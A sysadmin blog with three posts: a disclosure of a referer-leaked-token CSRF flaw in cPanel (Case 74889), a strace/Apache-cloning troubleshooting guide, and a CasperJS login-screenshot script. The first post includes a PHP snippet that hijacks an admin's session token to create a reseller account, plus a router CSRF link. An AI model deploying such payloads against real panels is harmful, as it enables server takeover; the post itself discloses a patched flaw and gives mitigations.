Control Panels, Cross Site Request Forgery, and Case 74889

The rise of web hosting control panels has changed the landscape of the web hosting industry dramatically. They reduce the barrier to entry for server administration by automating configuration and management tasks within a web-based GUI. Before this, server administrators had to configure their systems by hand, or through a suite of their own custom shell scripts and such.

While this has allowed more people to enter into the business and become resellers and administrators, it has its drawbacks. Some would argue that this has been damaging to the industry as it’s ushered in a wave of administrators who aren’t qualified enough or knowledgable enough to properly manage a server. In the right hands though, these panels can actually be a big help to both camps.

plesk-logoThat argument aside, something has never felt right to me about a web interface that you log into as root to run commands. It’s essentially a root kit with a pretty front-end. That said, there are protections in place to prevent exploitation, and cPanel in particular has a great security track record, and their security team from my experience was responsive, and a pleasure to work with.

cpanel-logo
One problem that I don’t think gets enough attention with these control panels like cPanel, Plesk, Webmin, DirectAdmin, and others, is the possibility for self-induced Cross Site Request Forgery, for lack of a better term.

Consider this hypothetical attack:

1) Compromise one or more vulnerable sites on the server (perhaps an outdated Joomla or WordPress site), and inject code like the following:

<?php 

$ref=$_SERVER['HTTP_REFERER'];
if( preg_match('/https?:\/\/.*\/sess_token[0-9]{10}/', $ref, $matches) ) {
	$url=$matches[0]."/api/create_reseller_account.php?resources=unlimited";
        echo "<script> window.open('$url','_blank'); </script>";
}

2) Wait for a systems administrator, logged into the panel as root to click on the URL link for the hacked domain from the control panel. The above would have the sysadmin unknowngly create an account with full privileges. It doesn’t take much creativity to do far worse, like adding a public ssh key through the panel, changing the root password, or anything else they are allowed to do.

The CSRF session token, designed to prevent this type of attack will be useless because the administrator just provided it to the hacked site via the referer (if their browser is configured to pass referers, which is the default in most browsers). The method above creates a new tab in the victim administrator’s browser to make the malicious control panel request, but you could easily make this action less transparent. Note also that my regular experession matches an optional https, but I believe this attack will only work if the administrator is using non-secure access to the panel. * – See #2 below.

I submitted a very similar, and working POC to cPanel’s security team, and they corrected the issue ( Case 74889 ) within a few weeks. I am willing to bet however that it’s a problem in other panels like Plesk, and perhaps other parts of cPanel that provide URL links to sites on the server. In this case, the POC was very similar to the code above, and it the vulnerability was in URLs in the “Manage SSL Hosts” section of the panel. They corrected it by cleansing the requests before redirecting you to the destination domain so as to remove the referer.

The reason I call it a self-induced CSRF is because it’s not exactly a plain-vanilla CSRF attack. Typically you would post a malicious link to a remote forum, chat, or email it to them, hoping they already has an active session at some other site. For example:

<a href="http://192.168.0.1/my-router/reset-router-password.php">Funny Cat Gifs LOL</a>

The above could be easily mitigated if the router’s admin panel used a randomized csrf token in the url.

However, in the case of the control panel attack, it bypasses any CSRF protections because the malicious link is clicked from the same origin being exploited, and the token is provided to us free of charge. If there’s a correct name for this type of attack, I don’t know it.

The moral of the story is:

1) Server Admin Control Panels will never really be secure.
2) * – Always use https if you have to use them. This is because browsers will IIRC, never pass a referer if the scheme changes from https to http, OR if the scheme remains https to https, but the origin changes.
3) Just don’t click on any remote urls from within a control panel if you don’t have to. Copy/paste to a new tab, or ‘middle click’ to open a new tab. (referer should not send this way)

Advanced Troubleshooting with Strace

Sometimes a site is performing erratically, or loading slowly and it’s not evident what the problem is. When you’ve run out of standard troubleshooting methods, it might be time to go deeper.

We need to go deeper.
We need to go deeper.
One way to do that is with a tool called strace. Strace allows you to track the system calls to the kernel in real time.

You can pass it a process id, or run it in front of a command.

Quick example:

Let’s use the -e trace option to tell strace what type of system call we’re interested in. We want to see what files it’s opening. We have a suspicion that running the host command will attempt to check our /etc/resolv.conf before querying the internet for an A record, so let’s verify that.

$ strace -e trace=open host google.com 2>&1 | grep resolv.conf
open("/etc/resolv.conf", O_RDONLY|O_LARGEFILE) = 6

As we expected, it does make an attempt to open that file.

Note that I redirected STDERR to STDOUT so I could grep the output. strace writes its output to STDERR. I won’t go into too much more detail about strace for now, but you get the idea.

Now back to our hypothetical slow or erratic website issue. The first step to troubleshooting an issue is duplicating the problem. The second step is making it repeatable. The third step is isolating the problem so you can pick it apart and examine it. When dealing with a busy webserver, the problem with doing that last step is that you don’t know which apache PID is serving you, so you can’t very well isolate it if you don’t know which one to iolate.

There are some hacky workarounds for isolating the apache process id that’s serving your HTTP requests. You can telnet to the server from the server, and find the pid via lsof, or netstat:

$ telnet localhost 80
GET / HTTP/1.1
Host: slow-domain.com

Then open another screen on the server, and find your telnet pid with netstat:

$ netstat -tapn

[..snip..]
tcp6       0      0 127.0.0.1:80            127.0.0.1:40402         ESTABLISHED 20008/apache2            
tcp        0      0 127.0.0.1:40402         127.0.0.1:80            ESTABLISHED 23955/telnet 

From this we know that process id 20008 is serving my telnet request because the remote and destination ports match. Then you can strace that PID, and quickly give your HTTP request in your telnet session the final carriage return to send the request. But this is clunky, and has race condition issues, and frankly it’s hard to get right.

But there is a better way. You can launch another instance of apache on different ports, say 81, and 444 (for https). Set the MaxClients value to 1, so only you can access it, then add an iptables rule to only allow your remote ip to access those destination ports.

Here’s an example of how you can do this on a cPanel server. Keep in mind, you may not need to copy everything like I did, but I just wanted to make sure I had an exact replica running on the alternate ports. You might want to exclude large log files and such if your apache diretory is large.

Clone the apache directory in full (binaries, conf, everything)

cp -r /usr/local/apache /usr/local/apache-tmp

Change ports for http and https so we can run ours without affecting the regular apache
$ cd /usr/local/apache-tmp
$ find . -type f -exec sed -i 's/:80/:81/g' {} \;
$ find . -type f -exec sed -i 's/:443/:444/g' {} \;

Only allow one maxclient, so we can find the apache pid serving us when we hit the site
$ find . -type f -exec sed -i 's/MaxClients.*/MaxClients\ 1/g' {} \;

Modify all absolute path references to the normal apache dir to our cloned one
$ find . -type f -exec sed -i 's/\/usr\/local\/apache/\/usr\/local\/apache-tmp\//g' {} \;

Now we can start our cloned apache on alternate ports 81,444 with just one maxclient allowed. You should then be able to access every site on the server via the alternate ports.
$ httpd -d /usr/local/apache-tmp/ -f /usr/local/apache-tmp/conf/httpd.conf

That launched the root httpd process with one child pid as expected
Now find the CHILD pid, try:
$ ps auxf | grep apache-tmp

Now to attach strace to the one and only apache process.
$ strace -p PID_HERE -f -s 2048

The -f option tells strace to follow child processes.
The -s option specifies how many bytes of each call to capture. 2048 might be overkill, so feel free to adjust this.

Then make the http request:

$ curl slowsite.com:81/badcode.php

This is definitely a drastic troubleshooting method, but it’s great for those times when you hit a brick wall diagnosing a slow-loading, or erratic behaving site and feel compelled to find find the issue.

Note: cPanel changes directory structure with updates from time to time. This was done a few months ago on a cpanel 11.40 build I believe. YMMV, use this tactic with caution.

Using CasperJS to Automate Server Migration Testing

casperjs-logo-dark

CasperJs is an open source navigation scripting & testing utility written in Javascript by Nicolas Perriault for the PhantomJS WebKit headless browser. It also works with Gecko-based SlimerJS as an alternative engine.

What does all of that mean? It means you can emulate navigation steps just as you would in a browser — without the browser.

I’ve played with PhantomJS in the past out of curiosity, but never thought it would become an important tool in my sysadmin toolbox. Well, it is now.

I was recently tasked with migrating sugarCRM instances. There are enough of them that manually testing each login post-migration was not something I was looking forward to. It’s fairly trivial to do this with cURL, but I wanted to try taking this a step further. I wanted to take a screenshot of the page after logging in, and save it to a file — all automagically. Enter CasperJS.

First, we create a new Casper instance. Setting verbose and debug logLevel is very useful for testing, but it’s optional. Notice there is a built-in test framework as well!

phantom.casperTest = true;
require("utils");

var casper = require('casper').create({
	verbose: true, 
	logLevel: 'debug',
	pageSettings: {
		userAgent: 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140611 Firefox/24.0 Iceweasel/24.6.0'
	}
});

Next, since I’m a sysadmin and linux junkie, I live in the command-line. So I’m using the CLI options parsing features built right in to CasperJS. I think the below is pretty self-explanatory and the options parsing just works:

Sample CLI usage:

kevin@kevops:~/$ casperjs ./sugarcrm-login.js --host="some-sugarcrm-site.com" --user="admin" --pass="p4ssw0rd" --ssl --imgdir="/home/kevin/screenshots/"

var host 		= casper.cli.get('host');
var user_name 		= casper.cli.get('user');
var user_password 	= casper.cli.get('pass');
var scheme		= 'http://';
var imgdir		= '/tmp/';

if(casper.cli.has('ssl')) { var scheme = 'https://'; }
if(casper.cli.has('imgdir')) { var imgdir = casper.cli.get('imgdir'); }

var base_uri = scheme + host;

Add some some event listeners. The first one allows us to locally print console.log messages. The second one emits when a page leaves a Javascript error uncaught.
casper.on('remote.message', function(msg) {
    this.echo('remote message caught: ' + msg);
});

casper.on("page.error", function(msg, trace) {
    this.echo("Page Error: " + msg, "ERROR");
});

Time to fire it up. One of the great things that casperJS adds to something like phantomJS is the ability to write simple code in a procedural way. This is important when you’re testing page navigation for a website, and avoids some of the headache from javascript’s asynchronous nature. The first thing we do is call casper.start() . This is what first loads the url.

Note that I’m trying out the test framework here, just to see how it works. It’s simple and intuitive if you’re familiar with testing frameworks.

casper.start(base_uri, function() {
	this.test.assertExists('form#form', 'form found!');
});

We determined that the form exists with our test statement, so now we need to fill in the fields and submit. Keep in mind, .fill() is looking for the “name” property of the form fields, which is user_name nand user_password in the case of sugarCRM logins.
casper.then(function() {
	this.fill('form#form', {
		'user_name':		user_name,
		'user_password':	user_password,
	}, true);
});

How does it work?
magic
So that filled out the form, submitted it, and went to the next step, just like you would using a browser. Is it really that simple? Yup.

Even more magical, we can take a screenshot once we login, and save it. How cool is that?

// login and grab snapshot
casper.then(function() {
	casper.viewport(1024, 768);
	this.capture(imgdir + host + '_login.jpg', undefined, {
        	quality: 100
	});
});

casper.run();

casper.run() is the final call, that kicks off the whole thing.

So now, since these sugarCRM sites all share a superadmin login and password, I can do something like this post migration:

#!/bin/bash
grep -i servername /etc/httpd/conf/httpd.conf | awk '{print $2}' | \
while IFS= read -r domain; do
  casperjs ./sugarcrm-login.js --host="$domain" --admin="admin" --pass="p4ssw0rd" --imgdir="/home/kevin/tmp/sugar-migrations/screenshots/"
done

Of course, I think I’ll add a lot more testing, and more commandline options to test if both http and https are working, and probably click through the admin panel for more thorough post-migration testing. I think I’d also like to create separate log files for each domain, but I’m not sure yet.

My next casperJS project will be to automate my daily work clock-ins. We have to login and logout of a web portal each day at work. Automating this each day with a screenshot is a perfect use case, and I’ll have meticulous records in case there’s ever an attendance discrepancy. 😎

sugarcrm-login.js:

phantom.casperTest = true;
require("utils");

var casper = require('casper').create({
	verbose: true, 
	logLevel: 'debug',
	pageSettings: {
		userAgent: 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140611 Firefox/24.0 Iceweasel/24.6.0'
	}
});

var host 		= casper.cli.get('host');
var user_name 		= casper.cli.get('user');
var user_password 	= casper.cli.get('pass');
var scheme		= 'http://';
var imgdir		= '/tmp/';

if(casper.cli.has('ssl')) { var scheme = 'https://'; }
if(casper.cli.has('imgdir')) { var imgdir = casper.cli.get('imgdir'); }

var base_uri = scheme + host;

casper.on('remote.message', function(msg) {
    this.echo('remote message caught: ' + msg);
});

casper.on("page.error", function(msg, trace) {
    this.echo("Page Error: " + msg, "ERROR");
});

casper.start(base_uri, function() {
	this.test.assertExists('form#form', 'form found!');
});

casper.then(function() {
	this.fill('form#form', {
		'user_name':		user_name,
		'user_password':	user_password,
	}, true);
});

// login and grab snapshot
casper.then(function() {
	casper.viewport(1024, 768);
	this.capture(imgdir + host + '_login.jpg', undefined, {
        	quality: 100
	});
});

casper.run();